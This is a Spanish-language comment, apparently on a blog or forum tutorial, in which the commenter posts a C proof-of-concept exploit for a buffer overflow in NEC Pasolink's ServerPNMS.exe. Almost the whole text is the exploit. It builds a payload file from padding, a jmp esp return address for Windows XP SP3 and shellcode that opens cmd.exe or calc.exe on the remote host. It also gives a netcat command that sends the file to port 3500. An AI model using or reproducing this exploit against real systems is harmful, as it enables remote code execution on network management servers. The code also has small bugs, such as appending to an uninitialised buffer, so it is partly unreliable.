Excelente tutorial.
Dejo un exploit hecho en C siguiendo el tuto, aunque con mis propias herramientas. O sea, sin metasploit.
Saludos.
-------------------------------------------------------------------------------------------------
/**
* Remote Exploit for ServerPNMS.exe PSNM client 5.6
* Proof of concept
* Pasolink NEC Management System
*
* Developed: MrPoor <
akelarregh@gmail.com>
* Discovered by Jesusssx at
http://jesusssx.wordpress.com/ *
* References:
*
http://jesusssx.wordpress.com/category/seguridad-aplicativa/ * Pasolink in NEC site:
http://www.nec.com/global/prod/nw/pasolink/ *
* Use: gcc -o ExploitServerPNMS ExploitServerPNMS.c (Cygwin under Windows)
* nc 127.0.0.1 < exploit.txt
* Spawn a cmd shell or a calc.exe in the remote host. You must specifiy your own shellcode!
* See code for change the shellcode.
* Tecnical details:
* buffer size:524+ret+shellcode
* maxbuffersize: unknown
*
* Spain
* 20/1/2011
* Tweaked for Windows XP SP3 Spanish. Must touch the ret for you OS, and maybe the shellcodes
* Leave the script kiddies alone!
*/
#include <stdio.h>
int main (int argc, char ** argv){
int i=0;
FILE *f;
f=fopen("exploit.txt", "wb+");
char buffer[1024];
/* Cmd.exe para Windows XP SP2 FR también funciona en Windows XP SP3 ES. */
char shellcode[]=
"\x8B\xEC\x33\xFF\x57"
"\xC6\x45\xFC\x63\xC6\x45"
"\xFD\x6D\xC6\x45\xFE\x64"
"\xC6\x45\xF8\x01\x8D"
"\x45\xFC\x50\xB8\xC7\x93"
"\xBF\x77\xFF\xD0\x00";
/*
http://www.exploit-db.com/exploits/13571/ * By Mountassif Moad *
* Works in Windows SP3 Spanish
*/
unsigned char shellcode_calc[] =
"\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC"
"\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45"
"\xF9\x61\xC6\x45\xFA\x6C\xC6\x45\xFB\x63\x8D\x45"
"\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3";
/* Offset jmp esp kernel32.dll WinXP SP3 Esp */
char offset[]="\x13\x44\x87\x7C";
if (f==NULL){
puts ("No se pudo crear el fichero");
}
/* Rellenamos los primeros 524 bytes hasta llegar al RET */
for (i;i<523;i++){
fprintf (f, "%c", 0x42);
}
strcat (buffer, offset);
strcat (buffer, shellcode);
fprintf (f, "%s", buffer);
printf ("Cmd shell in .\\exploit.txt\n");
printf ("This create a cmd.exe in remote host! Change to your shellcode\n");
printf ("Now: nc 127.0.0.1 3500 < exploit.txt");
fclose(f);
return 0;
}
-------------------------------------------------------------------------------------------------